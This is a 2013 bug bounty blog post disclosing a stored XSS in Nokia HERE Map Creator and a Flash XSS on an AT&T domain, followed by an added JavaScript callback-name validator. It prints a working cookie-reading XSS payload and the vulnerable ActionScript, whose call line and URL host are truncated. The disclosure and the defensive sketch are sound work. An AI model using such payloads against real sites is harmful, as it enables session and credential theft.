

Showing posts from October, 2013

Dangerous Persistent XSS at [FIX]

Here is a Nokia business unit that brings together Nokia's mapping and location assets under one brand. The technology of Here is based on a cloud-computing model, in which location data and services are stored on remote servers so that users have access to it regardless of which device they use.

 HERE Map Creator is a service launched by Nokia in November 2012 to allow users to map their neighborhood.

With this bug I could SAVE a road name with a payload on the map. Any user that tries to re-edit the street name will get this XSS.
I reported a similar bug a few months ago.

Nokia Response:

Thanks to Nokia for starting this bug bounty program.


I found a Flash XSS on AT&T's main domain where an attacker could steal users' credentials.

Vuln URL:;}catch(e) {alert(document.cookie);}//&source=
Payload: JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}//

Flash Vuln Code:
public function videoPlayer_completeHandler(_arg1:VideoEvent):void{
    if (ExternalInterface.available){
        , ExternalInterface.objectID);
    } else {
        trace("JSAM_VideoPlayer cannot call completeHandler because ExternalInterface is not available.");
    };
}

After 2 months AT&T Response:

I hope to be on the top 10 Award :)
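
The Flash payload above closes the try block that Flash Player wraps around the function name given to ExternalInterface.call, which it splices into a script string as raw text. The following is an added example, not code from the original post or from AT&T: a JavaScript sketch of the validation a player could apply to a callback name before that call. It assumes JSAM.flashCompleteHandler is the only legitimate callback; flashWrapper, checkCallbackName, catchCount and ALLOWED_CALLBACKS are hypothetical names.

```javascript
// Added example, not from the original post. All names here are hypothetical.

// Simplified model of the script string Flash Player evaluates for
// ExternalInterface.call(functionName, arg): the name is spliced in as raw text.
function flashWrapper(functionName, argLiteral) {
  return 'try { __flash__toXML(' + functionName + '(' + argLiteral + ')) ; } ' +
         'catch (e) { "<undefined/>"; }';
}

// Assumption: the page only ever needs this one completion callback.
const ALLOWED_CALLBACKS = new Set(['JSAM.flashCompleteHandler']);

// A callback name must be a plain dotted identifier: no (, ), {, }, ;, quotes or spaces.
const DOTTED_IDENT = /^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$/;

function checkCallbackName(name, allowed = ALLOWED_CALLBACKS) {
  if (typeof name !== 'string' || name.length === 0 || name.length > 128) {
    return { ok: false, reason: 'empty-or-too-long' };
  }
  if (!DOTTED_IDENT.test(name)) {
    return { ok: false, reason: 'not-a-dotted-identifier' };
  }
  if (!allowed.has(name)) {
    return { ok: false, reason: 'not-allowlisted' };
  }
  return { ok: true, reason: 'ok' };
}

// Number of catch clauses in the wrapper; anything other than 1 means the
// name escaped the single try/catch Flash intended.
function catchCount(wrapper) {
  return (wrapper.match(/\bcatch\s*\(/g) || []).length;
}

// Constructed inputs: the legitimate name, the payload quoted in the post,
// and a well-formed name that is not on the allowlist.
const samples = [
  'JSAM.flashCompleteHandler',
  'JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}//',
  'window.open',
];
for (const s of samples) {
  const verdict = checkCallbackName(s);
  console.log(verdict.reason, '| catch clauses if passed through:',
              catchCount(flashWrapper(s, '"player1"')));
}
```

The same check ports directly to ActionScript, where it belongs: applied to the parameter before ExternalInterface.call, with the allowlist as the final gate.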